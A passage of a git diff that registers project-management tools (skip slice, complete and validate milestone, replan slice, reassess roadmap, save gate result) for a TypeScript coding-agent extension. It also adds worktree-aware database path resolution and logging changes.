+      keyFiles: Type.Optional(Type.Union([Type.Array(Type.String()), Type.String()], { description: "Key files created or modified" })),
+      keyDecisions: Type.Optional(Type.Union([Type.Array(Type.String()), Type.String()], { description: "Key decisions made during this slice" })),
+      patternsEstablished: Type.Optional(Type.Union([Type.Array(Type.String()), Type.String()], { description: "Patterns established by this slice" })),
+      observabilitySurfaces: Type.Optional(Type.Union([Type.Array(Type.String()), Type.String()], { description: "Observability surfaces added" })),
+      provides: Type.Optional(Type.Union([Type.Array(Type.String()), Type.String()], { description: "What this slice provides to downstream slices" })),
+      requirementsSurfaced: Type.Optional(Type.Union([Type.Array(Type.String()), Type.String()], { description: "New requirements surfaced" })),
+      drillDownPaths: Type.Optional(Type.Union([Type.Array(Type.String()), Type.String()], { description: "Paths to task summaries for drill-down" })),
+      affects: Type.Optional(Type.Union([Type.Array(Type.String()), Type.String()], { description: "Downstream slices affected" })),
+      requirementsAdvanced: Type.Optional(Type.Array(
+        Type.Union([
+          Type.Object({
+            id: Type.String({ description: "Requirement ID" }),
+            how: Type.String({ description: "How it was advanced" }),
+          }),
+          Type.String({ description: "Fallback: 'ID — how' string" }),
+        ]),
+        { description: "Requirements advanced by this slice" },
+      )),
+      requirementsValidated: Type.Optional(Type.Array(
+        Type.Union([
+          Type.Object({
+            id: Type.String({ description: "Requirement ID" }),
+            proof: Type.String({ description: "What proof validates it" }),
+          }),
+          Type.String({ description: "Fallback: 'ID — proof' string" }),
+        ]),
+        { description: "Requirements validated by this slice" },
+      )),
+      requirementsInvalidated: Type.Optional(Type.Array(
+        Type.Union([
+          Type.Object({
+            id: Type.String({ description: "Requirement ID" }),
+            what: Type.String({ description: "What changed" }),
+          }),
+          Type.String({ description: "Fallback: 'ID — what' string" }),
+        ]),
+        { description: "Requirements invalidated or re-scoped" },
+      )),
+      filesModified: Type.Optional(Type.Array(
+        Type.Union([
+          Type.Object({
+            path: Type.String({ description: "File path" }),
+            description: Type.String({ description: "What changed" }),
+          }),
+          Type.String({ description: "Fallback: file path string" }),
+        ]),
+        { description: "Files modified with descriptions" },
+      )),
+      requires: Type.Optional(Type.Array(
+        Type.Union([
+          Type.Object({
+            slice: Type.String({ description: "Dependency slice ID" }),
+            provides: Type.String({ description: "What was consumed from it" }),
+          }),
+          Type.String({ description: "Fallback: slice ID string" }),
+        ]),
+        { description: "Upstream slice dependencies consumed" },
+      )),
+    }),
+    execute: sliceCompleteExecute,
+  };
+
+  pi.registerTool(sliceCompleteTool);
+  registerAlias(pi, sliceCompleteTool, "gsd_complete_slice", "gsd_slice_complete");
+
+  // ─── gsd_skip_slice (#3477 / #3487) ───────────────────────────────────
+
+  const skipSliceExecute = async (_toolCallId: string, params: any, _signal: AbortSignal | undefined, _onUpdate: unknown, _ctx: unknown) => {
+    const dbAvailable = await ensureDbOpen();
+    if (!dbAvailable) {
+      return {
+        content: [{ type: "text" as const, text: "Error: GSD database is not available. Cannot skip slice." }],
+        details: { operation: "skip_slice", error: "db_unavailable" } as any,
+      };
+    }
+    try {
+      const { getSlice, updateSliceStatus } = await import("../gsd-db.js");
+      const { invalidateStateCache } = await import("../state.js");
+
+      const slice = getSlice(params.milestoneId, params.sliceId);
+      if (!slice) {
+        return {
+          content: [{ type: "text" as const, text: `Error: Slice ${params.sliceId} not found in milestone ${params.milestoneId}` }],
+          details: { operation: "skip_slice", error: "slice_not_found" } as any,
+        };
+      }
+
+      if (slice.status === "complete" || slice.status === "done") {
+        return {
+          content: [{ type: "text" as const, text: `Error: Slice ${params.sliceId} is already complete — cannot skip.` }],
+          details: { operation: "skip_slice", error: "already_complete" } as any,
+        };
+      }
+
+      if (slice.status === "skipped") {
+        return {
+          content: [{ type: "text" as const, text: `Slice ${params.sliceId} is already skipped.` }],
+          details: { operation: "skip_slice", sliceId: params.sliceId, milestoneId: params.milestoneId } as any,
+        };
+      }
+
+      updateSliceStatus(params.milestoneId, params.sliceId, "skipped");
+      invalidateStateCache();
+
+      // Rebuild STATE.md so it reflects the skip immediately (#3477).
+      // Without this, /gsd auto reads stale STATE.md and resumes the skipped slice.
+      try {
+        const basePath = process.cwd();
+        const { rebuildState } = await import("../doctor.js");
+        await rebuildState(basePath);
+      } catch (err) {
+        logError("tool", `skip_slice rebuildState failed: ${(err as Error).message}`, { tool: "gsd_skip_slice" });
+      }
+
+      return {
+        content: [{ type: "text" as const, text: `Skipped slice ${params.sliceId} (${params.milestoneId}). Reason: ${params.reason ?? "User-directed skip"}. Auto-mode will advance past this slice.` }],
+        details: {
+          operation: "skip_slice",
+          sliceId: params.sliceId,
+          milestoneId: params.milestoneId,
+          reason: params.reason,
+        } as any,
+      };
+    } catch (err) {
+      const msg = err instanceof Error ? err.message : String(err);
+      logError("tool", `skip_slice tool failed: ${msg}`, { tool: "gsd_skip_slice", error: String(err) });
+      return {
+        content: [{ type: "text" as const, text: `Error skipping slice: ${msg}` }],
+        details: { operation: "skip_slice", error: msg } as any,
+      };
+    }
+  };
+
+  pi.registerTool({
+    name: "gsd_skip_slice",
+    label: "Skip Slice",
+    description:
+      "Mark a slice as skipped so auto-mode advances past it without executing. " +
+      "The slice data is preserved for reference. The state machine treats skipped slices like completed ones for dependency satisfaction.",
+    promptSnippet: "Skip a GSD slice (mark as skipped, auto-mode will advance past it)",
+    promptGuidelines: [
+      "Use gsd_skip_slice when a slice should be bypassed — descoped, superseded, or no longer relevant.",
+      "Cannot skip a slice that is already complete.",
+      "Skipped slices satisfy downstream dependencies just like completed slices.",
+    ],
+    parameters: Type.Object({
+      sliceId: Type.String({ description: "Slice ID (e.g. S02)" }),
+      milestoneId: Type.String({ description: "Milestone ID (e.g. M003)" }),
+      reason: Type.Optional(Type.String({ description: "Reason for skipping this slice" })),
+    }),
+    execute: skipSliceExecute,
+  });
+
+  // ─── gsd_complete_milestone ────────────────────────────────────────────
+
+  const milestoneCompleteExecute = async (_toolCallId: string, params: any, _signal: AbortSignal | undefined, _onUpdate: unknown, _ctx: unknown) => {
+    const dbAvailable = await ensureDbOpen();
+    if (!dbAvailable) {
+      return {
+        content: [{ type: "text" as const, text: "Error: GSD database is not available. Cannot complete milestone." }],
+        details: { operation: "complete_milestone", error: "db_unavailable" } as any,
+      };
+    }
+    try {
+      // ── Input sanitization: normalize markdown parameters (#3013) ──────
+      const { sanitizeCompleteMilestoneParams } = await import("./sanitize-complete-milestone.js");
+      const sanitized = sanitizeCompleteMilestoneParams(params);
+
+      const { handleCompleteMilestone } = await import("../tools/complete-milestone.js");
+      const result = await handleCompleteMilestone(sanitized, process.cwd());
+      if ("error" in result) {
+        return {
+          content: [{ type: "text" as const, text: `Error completing milestone: ${result.error}` }],
+          details: { operation: "complete_milestone", error: result.error } as any,
+        };
+      }
+      return {
+        content: [{ type: "text" as const, text: `Completed milestone ${result.milestoneId}. Summary written to ${result.summaryPath}` }],
+        details: {
+          operation: "complete_milestone",
+          milestoneId: result.milestoneId,
+          summaryPath: result.summaryPath,
+        } as any,
+      };
+    } catch (err) {
+      const msg = err instanceof Error ? err.message : String(err);
+      logError("tool", `complete_milestone tool failed: ${msg}`, { tool: "gsd_complete_milestone", error: String(err) });
+      return {
+        content: [{ type: "text" as const, text: `Error completing milestone: ${msg}` }],
+        details: { operation: "complete_milestone", error: msg } as any,
+      };
+    }
+  };
+
+  const milestoneCompleteTool = {
+    name: "gsd_complete_milestone",
+    label: "Complete Milestone",
+    description:
+      "Record a completed milestone to the GSD database, render MILESTONE-SUMMARY.md to disk — all in one atomic operation. " +
+      "Validates all slices are complete before proceeding.",
+    promptSnippet: "Complete a GSD milestone (DB write + summary render)",
+    promptGuidelines: [
+      "Use gsd_complete_milestone when all slices in a milestone are finished and the milestone needs to be recorded.",
+      "All slices in the milestone must have status 'complete' — the handler validates this before proceeding.",
+      "verificationPassed must be explicitly set to true — the handler rejects completion if verification did not pass.",
+      "On success, returns summaryPath where the MILESTONE-SUMMARY.md was written.",
+    ],
+    parameters: Type.Object({
+      // ── Core identification + content (required) ──────────────────────
+      milestoneId: Type.String({ description: "Milestone ID (e.g. M001)" }),
+      title: Type.String({ description: "Milestone title" }),
+      oneLiner: Type.String({ description: "One-sentence summary of what the milestone achieved" }),
+      narrative: Type.String({ description: "Detailed narrative of what happened during the milestone" }),
+      verificationPassed: Type.Boolean({ description: "Must be true — confirms that code change verification, success criteria, and definition of done checks all passed before completion" }),
+      // ── Enrichment metadata (optional — defaults to empty) ────────────
+      successCriteriaResults: Type.Optional(Type.String({ description: "Markdown detailing how each success criterion was met or not met" })),
+      definitionOfDoneResults: Type.Optional(Type.String({ description: "Markdown detailing how each definition-of-done item was met" })),
+      requirementOutcomes: Type.Optional(Type.String({ description: "Markdown detailing requirement status transitions with evidence" })),
+      keyDecisions: Type.Optional(Type.Array(Type.String(), { description: "Key architectural/pattern decisions made during the milestone" })),
+      keyFiles: Type.Optional(Type.Array(Type.String(), { description: "Key files created or modified during the milestone" })),
+      lessonsLearned: Type.Optional(Type.Array(Type.String(), { description: "Lessons learned during the milestone" })),
+      followUps: Type.Optional(Type.String({ description: "Follow-up items for future milestones" })),
+      deviations: Type.Optional(Type.String({ description: "Deviations from the original plan" })),
+    }),
+    execute: milestoneCompleteExecute,
+  };
+
+  pi.registerTool(milestoneCompleteTool);
+  registerAlias(pi, milestoneCompleteTool, "gsd_milestone_complete", "gsd_complete_milestone");
+
+  // ─── gsd_validate_milestone (gsd_milestone_validate alias) ─────────────
+
+  const milestoneValidateExecute = async (_toolCallId: string, params: any, _signal: AbortSignal | undefined, _onUpdate: unknown, _ctx: unknown) => {
+    const dbAvailable = await ensureDbOpen();
+    if (!dbAvailable) {
+      return {
+        content: [{ type: "text" as const, text: "Error: GSD database is not available. Cannot validate milestone." }],
+        details: { operation: "validate_milestone", error: "db_unavailable" } as any,
+      };
+    }
+    try {
+      const { handleValidateMilestone } = await import("../tools/validate-milestone.js");
+      const result = await handleValidateMilestone(params, process.cwd());
+      if ("error" in result) {
+        return {
+          content: [{ type: "text" as const, text: `Error validating milestone: ${result.error}` }],
+          details: { operation: "validate_milestone", error: result.error } as any,
+        };
+      }
+      return {
+        content: [{ type: "text" as const, text: `Validated milestone ${result.milestoneId} — verdict: ${result.verdict}. Written to ${result.validationPath}` }],
+        details: {
+          operation: "validate_milestone",
+          milestoneId: result.milestoneId,
+          verdict: result.verdict,
+          validationPath: result.validationPath,
+        } as any,
+      };
+    } catch (err) {
+      const msg = err instanceof Error ? err.message : String(err);
+      logError("tool", `validate_milestone tool failed: ${msg}`, { tool: "gsd_validate_milestone", error: String(err) });
+      return {
+        content: [{ type: "text" as const, text: `Error validating milestone: ${msg}` }],
+        details: { operation: "validate_milestone", error: msg } as any,
+      };
+    }
+  };
+
+  const milestoneValidateTool = {
+    name: "gsd_validate_milestone",
+    label: "Validate Milestone",
+    description:
+      "Validate a milestone before completion — persist validation results to the DB, render VALIDATION.md to disk. " +
+      "Records verdict (pass/needs-attention/needs-remediation) and rationale.",
+    promptSnippet: "Validate a GSD milestone (DB write + VALIDATION.md render)",
+    promptGuidelines: [
+      "Use gsd_validate_milestone when all slices are done and the milestone needs validation before completion.",
+      "Parameters: milestoneId, verdict, remediationRound, successCriteriaChecklist, sliceDeliveryAudit, crossSliceIntegration, requirementCoverage, verificationClasses (optional), verdictRationale, remediationPlan (optional).",
+      "If verdict is 'needs-remediation', also provide remediationPlan and use gsd_reassess_roadmap to add remediation slices to the roadmap.",
+      "On success, returns validationPath where VALIDATION.md was written.",
+    ],
+    parameters: Type.Object({
+      milestoneId: Type.String({ description: "Milestone ID (e.g. M001)" }),
+      verdict: StringEnum(["pass", "needs-attention", "needs-remediation"], { description: "Validation verdict" }),
+      remediationRound: Type.Number({ description: "Remediation round (0 for first validation)" }),
+      successCriteriaChecklist: Type.String({ description: "Markdown checklist of success criteria with pass/fail and evidence" }),
+      sliceDeliveryAudit: Type.String({ description: "Markdown table auditing each slice's claimed vs delivered output" }),
+      crossSliceIntegration: Type.String({ description: "Markdown describing any cross-slice boundary mismatches" }),
+      requirementCoverage: Type.String({ description: "Markdown describing any unaddressed requirements" }),
+      verificationClasses: Type.Optional(Type.String({ description: "Markdown describing verification class compliance and gaps" })),
+      verdictRationale: Type.String({ description: "Why this verdict was chosen" }),
+      remediationPlan: Type.Optional(Type.String({ description: "Remediation plan (required if verdict is needs-remediation)" })),
+    }),
+    execute: milestoneValidateExecute,
+  };
+
+  pi.registerTool(milestoneValidateTool);
+  registerAlias(pi, milestoneValidateTool, "gsd_milestone_validate", "gsd_validate_milestone");
+
+  // ─── gsd_replan_slice (gsd_slice_replan alias) ─────────────────────────
+
+  const replanSliceExecute = async (_toolCallId: string, params: any, _signal: AbortSignal | undefined, _onUpdate: unknown, _ctx: unknown) => {
+    const dbAvailable = await ensureDbOpen();
+    if (!dbAvailable) {
+      return {
+        content: [{ type: "text" as const, text: "Error: GSD database is not available. Cannot replan slice." }],
+        details: { operation: "replan_slice", error: "db_unavailable" } as any,
+      };
+    }
+    try {
+      const { handleReplanSlice } = await import("../tools/replan-slice.js");
+      const result = await handleReplanSlice(params, process.cwd());
+      if ("error" in result) {
+        return {
+          content: [{ type: "text" as const, text: `Error replanning slice: ${result.error}` }],
+          details: { operation: "replan_slice", error: result.error } as any,
+        };
+      }
+      return {
+        content: [{ type: "text" as const, text: `Replanned slice ${result.sliceId} (${result.milestoneId})` }],
+        details: {
+          operation: "replan_slice",
+          milestoneId: result.milestoneId,
+          sliceId: result.sliceId,
+          replanPath: result.replanPath,
+          planPath: result.planPath,
+        } as any,
+      };
+    } catch (err) {
+      const msg = err instanceof Error ? err.message : String(err);
+      logError("tool", `replan_slice tool failed: ${msg}`, { tool: "gsd_replan_slice", error: String(err) });
+      return {
+        content: [{ type: "text" as const, text: `Error replanning slice: ${msg}` }],
+        details: { operation: "replan_slice", error: msg } as any,
+      };
+    }
+  };
+
+  const replanSliceTool = {
+    name: "gsd_replan_slice",
+    label: "Replan Slice",
+    description:
+      "Replan a slice after a blocker is discovered. Structurally enforces preservation of completed tasks — " +
+      "mutations to completed task IDs are rejected with actionable error payloads. Writes replan history to DB, " +
+      "applies task mutations, re-renders PLAN.md, and renders REPLAN.md.",
+    promptSnippet: "Replan a GSD slice with structural enforcement of completed tasks",
+    promptGuidelines: [
+      "Use gsd_replan_slice (canonical) or gsd_slice_replan (alias) when a blocker is discovered and the slice plan needs rewriting.",
+      "The tool structurally enforces that completed tasks cannot be updated or removed — violations return specific error payloads naming the blocked task ID.",
+      "Parameters: milestoneId, sliceId, blockerTaskId, blockerDescription, whatChanged, updatedTasks (array), removedTaskIds (array).",
+      "updatedTasks items: taskId, title, description, estimate, files, verify, inputs, expectedOutput.",
+    ],
+    parameters: Type.Object({
+      milestoneId: Type.String({ description: "Milestone ID (e.g. M001)" }),
+      sliceId: Type.String({ description: "Slice ID (e.g. S01)" }),
+      blockerTaskId: Type.String({ description: "Task ID that discovered the blocker" }),
+      blockerDescription: Type.String({ description: "Description of the blocker" }),
+      whatChanged: Type.String({ description: "Summary of what changed in the plan" }),
+      updatedTasks: Type.Array(
+        Type.Object({
+          taskId: Type.String({ description: "Task ID (e.g. T01)" }),
+          title: Type.String({ description: "Task title" }),
+          description: Type.String({ description: "Task description / steps block" }),
+          estimate: Type.String({ description: "Task estimate string" }),
+          files: Type.Array(Type.String(), { description: "Files likely touched" }),
+          verify: Type.String({ description: "Verification command or block" }),
+          inputs: Type.Array(Type.String(), { description: "Input files or references" }),
+          expectedOutput: Type.Array(Type.String(), { description: "Expected output files or artifacts" }),
+        }),
+        { description: "Tasks to upsert (update existing or insert new)" },
+      ),
+      removedTaskIds: Type.Array(Type.String(), { description: "Task IDs to remove from the slice" }),
+    }),
+    execute: replanSliceExecute,
+  };
+
+  pi.registerTool(replanSliceTool);
+  registerAlias(pi, replanSliceTool, "gsd_slice_replan", "gsd_replan_slice");
+
+  // ─── gsd_reassess_roadmap (gsd_roadmap_reassess alias) ─────────────────
+
+  const reassessRoadmapExecute = async (_toolCallId: string, params: any, _signal: AbortSignal | undefined, _onUpdate: unknown, _ctx: unknown) => {
+    const dbAvailable = await ensureDbOpen();
+    if (!dbAvailable) {
+      return {
+        content: [{ type: "text" as const, text: "Error: GSD database is not available. Cannot reassess roadmap." }],
+        details: { operation: "reassess_roadmap", error: "db_unavailable" } as any,
+      };
+    }
+    try {
+      const { handleReassessRoadmap } = await import("../tools/reassess-roadmap.js");
+      const result = await handleReassessRoadmap(params, process.cwd());
+      if ("error" in result) {
+        return {
+          content: [{ type: "text" as const, text: `Error reassessing roadmap: ${result.error}` }],
+          details: { operation: "reassess_roadmap", error: result.error } as any,
+        };
+      }
+      return {
+        content: [{ type: "text" as const, text: `Reassessed roadmap for milestone ${result.milestoneId} after ${result.completedSliceId}` }],
+        details: {
+          operation: "reassess_roadmap",
+          milestoneId: result.milestoneId,
+          completedSliceId: result.completedSliceId,
+          assessmentPath: result.assessmentPath,
+          roadmapPath: result.roadmapPath,
+        } as any,
+      };
+    } catch (err) {
+      const msg = err instanceof Error ? err.message : String(err);
+      logError("tool", `reassess_roadmap tool failed: ${msg}`, { tool: "gsd_reassess_roadmap", error: String(err) });
+      return {
+        content: [{ type: "text" as const, text: `Error reassessing roadmap: ${msg}` }],
+        details: { operation: "reassess_roadmap", error: msg } as any,
+      };
+    }
+  };
+
+  const reassessRoadmapTool = {
+    name: "gsd_reassess_roadmap",
+    label: "Reassess Roadmap",
+    description:
+      "Reassess the milestone roadmap after a slice completes. Structurally enforces preservation of completed slices — " +
+      "mutations to completed slice IDs are rejected with actionable error payloads. Writes assessment to DB, " +
+      "applies slice mutations, re-renders ROADMAP.md, and renders ASSESSMENT.md.",
+    promptSnippet: "Reassess a GSD roadmap with structural enforcement of completed slices",
+    promptGuidelines: [
+      "Use gsd_reassess_roadmap (canonical) or gsd_roadmap_reassess (alias) after a slice completes to reassess the roadmap.",
+      "The tool structurally enforces that completed slices cannot be modified or removed — violations return specific error payloads naming the blocked slice ID.",
+      "Parameters: milestoneId, completedSliceId, verdict, assessment, sliceChanges (object with modified, added, removed arrays).",
+      "sliceChanges.modified items: sliceId, title, risk (optional), depends (optional), demo (optional).",
+    ],
+    parameters: Type.Object({
+      milestoneId: Type.String({ description: "Milestone ID (e.g. M001)" }),
+      completedSliceId: Type.String({ description: "Slice ID that just completed" }),
+      verdict: Type.String({ description: "Assessment verdict (e.g. 'roadmap-confirmed', 'roadmap-adjusted')" }),
+      assessment: Type.String({ description: "Assessment text explaining the decision" }),
+      sliceChanges: Type.Object({
+        modified: Type.Array(
+          Type.Object({
+            sliceId: Type.String({ description: "Slice ID to modify" }),
+            title: Type.String({ description: "Updated slice title" }),
+            risk: Type.Optional(Type.String({ description: "Updated risk level" })),
+            depends: Type.Optional(Type.Array(Type.String(), { description: "Updated dependencies" })),
+            demo: Type.Optional(Type.String({ description: "Updated demo text" })),
+          }),
+          { description: "Slices to modify" },
+        ),
+        added: Type.Array(
+          Type.Object({
+            sliceId: Type.String({ description: "New slice ID" }),
+            title: Type.String({ description: "New slice title" }),
+            risk: Type.Optional(Type.String({ description: "Risk level" })),
+            depends: Type.Optional(Type.Array(Type.String(), { description: "Dependencies" })),
+            demo: Type.Optional(Type.String({ description: "Demo text" })),
+          }),
+          { description: "New slices to add" },
+        ),
+        removed: Type.Array(Type.String(), { description: "Slice IDs to remove" }),
+      }, { description: "Slice changes to apply" }),
+    }),
+    execute: reassessRoadmapExecute,
+  };
+
+  pi.registerTool(reassessRoadmapTool);
+  registerAlias(pi, reassessRoadmapTool, "gsd_roadmap_reassess", "gsd_reassess_roadmap");
+
+  // ─── gsd_save_gate_result ──────────────────────────────────────────────
+
+  const saveGateResultExecute = async (_toolCallId: string, params: any, _signal: AbortSignal | undefined, _onUpdate: unknown, _ctx: unknown) => {
+    const dbAvailable = await ensureDbOpen();
+    if (!dbAvailable) {
+      return {
+        content: [{ type: "text" as const, text: "Error: GSD database is not available." }],
+        details: { operation: "save_gate_result", error: "db_unavailable" } as any,
+      };
+    }
+    const validGates = ["Q3", "Q4", "Q5", "Q6", "Q7", "Q8"];
+    if (!validGates.includes(params.gateId)) {
+      return {
+        content: [{ type: "text" as const, text: `Error: Invalid gateId "${params.gateId}". Must be one of: ${validGates.join(", ")}` }],
+        details: { operation: "save_gate_result", error: "invalid_gate_id" } as any,
+      };
+    }
+    const validVerdicts = ["pass", "flag", "omitted"];
+    if (!validVerdicts.includes(params.verdict)) {
+      return {
+        content: [{ type: "text" as const, text: `Error: Invalid verdict "${params.verdict}". Must be one of: ${validVerdicts.join(", ")}` }],
+        details: { operation: "save_gate_result", error: "invalid_verdict" } as any,
+      };
+    }
+    try {
+      const { saveGateResult } = await import("../gsd-db.js");
+      const { invalidateStateCache } = await import("../state.js");
+      saveGateResult({
+        milestoneId: params.milestoneId,
+        sliceId: params.sliceId,
+        gateId: params.gateId,
+        taskId: params.taskId ?? "",
+        verdict: params.verdict,
+        rationale: params.rationale,
+        findings: params.findings ?? "",
+      });
+      invalidateStateCache();
+      return {
+        content: [{ type: "text" as const, text: `Gate ${params.gateId} result saved: verdict=${params.verdict}` }],
+        details: { operation: "save_gate_result", gateId: params.gateId, verdict: params.verdict } as any,
+      };
+    } catch (err) {
+      const msg = err instanceof Error ? err.message : String(err);
+      logError("tool", `gsd_save_gate_result failed: ${msg}`, { tool: "gsd_save_gate_result", error: String(err) });
+      return {
+        content: [{ type: "text" as const, text: `Error saving gate result: ${msg}` }],
+        details: { operation: "save_gate_result", error: msg } as any,
+      };
+    }
+  };
+
+  const saveGateResultTool = {
+    name: "gsd_save_gate_result",
+    label: "Save Gate Result",
+    description:
+      "Save the result of a quality gate evaluation (Q3-Q8) to the GSD database. " +
+      "Called by gate evaluation sub-agents after analyzing a specific quality question.",
+    promptSnippet: "Save quality gate evaluation result (verdict, rationale, findings)",
+    promptGuidelines: [
+      "Use gsd_save_gate_result after evaluating a quality gate question.",
+      "gateId must be one of: Q3, Q4, Q5, Q6, Q7, Q8.",
+      "verdict must be: pass (no concerns), flag (concerns found), or omitted (not applicable).",
+      "rationale should be a one-sentence justification for the verdict.",
+      "findings should contain detailed markdown analysis (or empty string if omitted).",
+    ],
+    parameters: Type.Object({
+      milestoneId: Type.String({ description: "Milestone ID (e.g. M001)" }),
+      sliceId: Type.String({ description: "Slice ID (e.g. S01)" }),
+      gateId: Type.String({ description: "Gate ID: Q3, Q4, Q5, Q6, Q7, or Q8" }),
+      taskId: Type.Optional(Type.String({ description: "Task ID for task-scoped gates (Q5/Q6/Q7)" })),
+      verdict: Type.String({ description: "pass, flag, or omitted" }),
+      rationale: Type.String({ description: "One-sentence justification" }),
+      findings: Type.Optional(Type.String({ description: "Detailed markdown findings" })),
+    }),
+    execute: saveGateResultExecute,
+    renderCall(args: any, theme: any) {
+      let text = theme.fg("toolTitle", theme.bold("save_gate_result "));
+      text += theme.fg("accent", args.gateId ?? "");
+      text += theme.fg("dim", ` → ${args.verdict ?? ""}`);
+      return new Text(text, 0, 0);
+    },
+    renderResult(result: any, _options: any, theme: any) {
+      const d = result.details;
+      if (result.isError || d?.error) {
+        return new Text(theme.fg("error", `Error: ${d?.error ?? "unknown"}`), 0, 0);
+      }
+      const color = d?.verdict === "flag" ? "warning" : "success";
+      return new Text(theme.fg(color, `${d?.gateId}: ${d?.verdict}`), 0, 0);
+    },
+  };
+
+  pi.registerTool(saveGateResultTool);
 }
diff --git a/src/resources/extensions/gsd/bootstrap/dynamic-tools.ts b/src/resources/extensions/gsd/bootstrap/dynamic-tools.ts
index da502ce67..8061c1b20 100644
--- a/src/resources/extensions/gsd/bootstrap/dynamic-tools.ts
+++ b/src/resources/extensions/gsd/bootstrap/dynamic-tools.ts
@@ -1,10 +1,79 @@
 import { existsSync } from "node:fs";
-import { join } from "node:path";
+import { join, sep } from "node:path";
 
 import type { ExtensionAPI } from "@gsd/pi-coding-agent";
 import { createBashTool, createEditTool, createReadTool, createWriteTool } from "@gsd/pi-coding-agent";
 
 import { DEFAULT_BASH_TIMEOUT_SECS } from "../constants.js";
+import { setLogBasePath, logWarning } from "../workflow-logger.js";
+
+/**
+ * Resolve the correct DB path for the current working directory.
+ * If `basePath` is inside a `.gsd/worktrees/<MID>/` directory, returns
+ * the project root's `.gsd/gsd.db` (shared WAL — R012). Otherwise
+ * returns `<basePath>/.gsd/gsd.db`.
+ */
+export function resolveProjectRootDbPath(basePath: string): string {
+  // Detect worktree: look for `.gsd/worktrees/` in the path segments.
+  // A worktree path looks like: /project/root/.gsd/worktrees/M001/...
+  // We need to resolve back to /project/root/.gsd/gsd.db
+  const marker = `${sep}.gsd${sep}worktrees${sep}`;
+  const idx = basePath.indexOf(marker);
+  if (idx !== -1) {
+    const projectRoot = basePath.slice(0, idx);
+    return join(projectRoot, ".gsd", "gsd.db");
+  }
+
+  // Also handle forward-slash paths on all platforms
+  const fwdMarker = "/.gsd/worktrees/";
+  const fwdIdx = basePath.indexOf(fwdMarker);
+  if (fwdIdx !== -1) {
+    const projectRoot = basePath.slice(0, fwdIdx);
+    return join(projectRoot, ".gsd", "gsd.db");
+  }
+
+  // External-state layout: ~/.gsd/projects/<hash>/worktrees/<MID>/...
+  // Resolve to ~/.gsd/projects/<hash>/gsd.db (the canonical project DB) (#2952).
+  // Must be checked before the generic symlink-resolved handler: both match
+  // /.gsd/projects/<hash>/worktrees/ but require different resolution targets.
+  const extRe = /[/\\]\.gsd[/\\]projects[/\\][a-f0-9]+[/\\]worktrees(?:[/\\]|$)/;
+  const extMatch = extRe.exec(basePath);
+  if (extMatch) {
+    const matchStr = extMatch[0];
+    // Find the "/worktrees" portion within the match and slice up to it
+    const wtIdx = matchStr.search(/[/\\]worktrees(?:[/\\]|$)/);
+    const projectStateRoot = basePath.slice(0, extMatch.index + wtIdx);
+    return join(projectStateRoot, "gsd.db");
+  }
+
+  // Symlink-resolved layout: /.gsd/projects/<hash>/worktrees/M001/...
+  // The project root is everything before /.gsd/projects/ (#2517)
+  const symlinkMarker = `${sep}.gsd${sep}projects${sep}`;
+  const symlinkIdx = basePath.indexOf(symlinkMarker);
+  if (symlinkIdx !== -1) {
+    const afterProjects = basePath.slice(symlinkIdx + symlinkMarker.length);
+    // Expect: <hash>/worktrees/...
+    const worktreeSeg = `${sep}worktrees${sep}`;
+    if (afterProjects.includes(worktreeSeg)) {
+      const projectRoot = basePath.slice(0, symlinkIdx);
+      return join(projectRoot, ".gsd", "gsd.db");
+    }
+  }
+
+  // Forward-slash variant for symlink-resolved layout
+  const fwdSymlinkMarker = "/.gsd/projects/";
+  const fwdSymlinkIdx = basePath.indexOf(fwdSymlinkMarker);
+  if (fwdSymlinkIdx !== -1) {
+    const afterProjects = basePath.slice(fwdSymlinkIdx + fwdSymlinkMarker.length);
+    if (afterProjects.includes("/worktrees/")) {
+      const projectRoot = basePath.slice(0, fwdSymlinkIdx);
+      return join(projectRoot, ".gsd", "gsd.db");
+    }
+  }
+
+
+  return join(basePath, ".gsd", "gsd.db");
+}
 
 export async function ensureDbOpen(): Promise<boolean> {
   try {
@@ -12,12 +81,17 @@ export async function ensureDbOpen(): Promise<boolean> {
     if (db.isDbAvailable()) return true;
 
     const basePath = process.cwd();
+    const dbPath = resolveProjectRootDbPath(basePath);
     const gsdDir = join(basePath, ".gsd");
-    const dbPath = join(gsdDir, "gsd.db");
 
-    // Open existing DB file
+    // Derive the project root from the DB path (strip .gsd/gsd.db)
+    const projectRoot = join(dbPath, "..", "..");
+
+    // Open existing DB file (may be at project root for worktrees)
     if (existsSync(dbPath)) {
-      return db.openDatabase(dbPath);
+      const opened = db.openDatabase(dbPath);
+      if (opened) setLogBasePath(projectRoot);
+      return opened;
     }
 
     // No DB file — create + migrate from Markdown if .gsd/ has content
@@ -28,21 +102,27 @@ export async function ensureDbOpen(): Promise<boolean> {
       if (hasDecisions || hasRequirements || hasMilestones) {
         const opened = db.openDatabase(dbPath);
         if (opened) {
+          setLogBasePath(projectRoot);
           try {
             const { migrateFromMarkdown } = await import("../md-importer.js");
             migrateFromMarkdown(basePath);
           } catch (err) {
-            process.stderr.write(
-              `gsd-db: ensureDbOpen auto-migration failed: ${(err as Error).message}\n`,
-            );
+            logWarning("bootstrap", `ensureDbOpen auto-migration failed: ${(err as Error).message}`);
           }
         }
         return opened;
       }
+
+      // .gsd/ exists but has no Markdown content (fresh project) — create empty DB
+      const opened = db.openDatabase(dbPath);
+      if (opened) setLogBasePath(projectRoot);
+      return opened;
     }
 
+    logWarning("bootstrap", "ensureDbOpen failed — no .gsd directory found");
     return false;
-  } catch {
+  } catch (err) {
+    logWarning("bootstrap", `ensureDbOpen failed: ${(err as Error).message ?? String(err)}`);
     return false;
   }
 }
diff --git a/src/resources/extensions/gsd/bootstrap/journal-tools.ts b/src/resources/extensions/gsd/bootstrap/journal-tools.ts
index 7262d0b6d..9a1aa9dec 100644
--- a/src/resources/extensions/gsd/bootstrap/journal-tools.ts
+++ b/src/resources/extensions/gsd/bootstrap/journal-tools.ts
@@ -2,6 +2,7 @@ import { Type } from "@sinclair/typebox";
 import type { ExtensionAPI } from "@gsd/pi-coding-agent";
 
 import { queryJournal } from "../journal.js";
+import { logWarning } from "../workflow-logger.js";
 
 export function registerJournalTools(pi: ExtensionAPI): void {
   pi.registerTool({
@@ -51,7 +52,7 @@ export function registerJournalTools(pi: ExtensionAPI): void {
         };
       } catch (err) {
         const msg = err instanceof Error ? err.message : String(err);
-        process.stderr.write(`gsd-journal: gsd_journal_query tool failed: ${msg}\n`);
+        logWarning("tool", `gsd_journal_query tool failed: ${msg}`);
         return {
           content: [{ type: "text" as const, text: `Error querying journal: ${msg}` }],
           details: { operation: "journal_query", error: msg } as any,
